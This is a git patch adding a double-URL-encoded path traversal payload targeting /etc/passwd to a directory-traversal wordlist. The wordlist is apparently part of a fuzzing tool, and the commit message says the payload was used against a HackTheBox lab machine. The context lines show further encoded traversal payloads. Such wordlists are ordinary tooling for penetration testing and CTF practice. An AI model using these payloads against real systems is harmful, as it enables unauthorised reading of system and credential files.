From df52bacdd6f64af7f61f8fb56729e3827af01b6f Mon Sep 17 00:00:00 2001 From: Najam Ul Saqib Date: Thu, 9 Feb 2023 04:16:54 -0800 Subject: [PATCH] Update dirTraversal-nix.txt Double encode the payload `../../../../../../../../etc/passwd` using mechanism https://owasp.org/www-community/Double_Encoding, it is being practiced to exploit LFI at box "broscience" in hackthebox --- wordlist/vulns/dirTraversal-nix.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/wordlist/vulns/dirTraversal-nix.txt b/wordlist/vulns/dirTraversal-nix.txt index b2a88a86..af9d7779 100644 --- a/wordlist/vulns/dirTraversal-nix.txt +++ b/wordlist/vulns/dirTraversal-nix.txt @@ -30,6 +30,7 @@ %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd +%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34 ..%252f/etc/passwd ..%252f..%252f/etc/passwd ..%252f..%252f..%252f/etc/passwd